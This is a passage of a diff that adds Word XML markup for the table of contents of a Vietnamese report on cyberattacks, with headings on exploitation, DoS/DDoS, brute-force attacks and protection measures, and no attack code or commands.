+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC3"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="1320"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343457" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2.4.1.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Nguyên nhân và cách thức khai thác</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343457 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC3"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="1320"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343458" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2.4.2.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Hậu quả</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343458 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC2"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="880"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343459" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2.5.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Tấn công từ chối dịch vụ (DoS/DDoS)</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343459 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC3"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="1320"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343460" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2.5.1.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Phân biệt DoS và DDoS</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343460 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC3"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="1320"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343461" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2.5.2.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Các dạng tấn công theo lớp</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343461 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC3"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="1320"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343462" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2.5.3.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Hậu quả và các case study nổi tiếng</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343462 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC2"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="880"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343463" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2.6.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Tấn công dò mật khẩu (Brute-Force Attack)</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343463 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC3"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="1320"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343464" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2.6.1.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Cơ chế hoạt động và các biến thể</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343464 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC3"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="1320"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343465" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2.6.2.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Hậu quả và các công cụ tấn công</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343465 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC1"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="480"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343466" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>3.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>BIỆN PHÁP PHÒNG CHỐNG VÀ BẢO VỆ</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343466 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC2"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="880"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343467" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>3.1.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
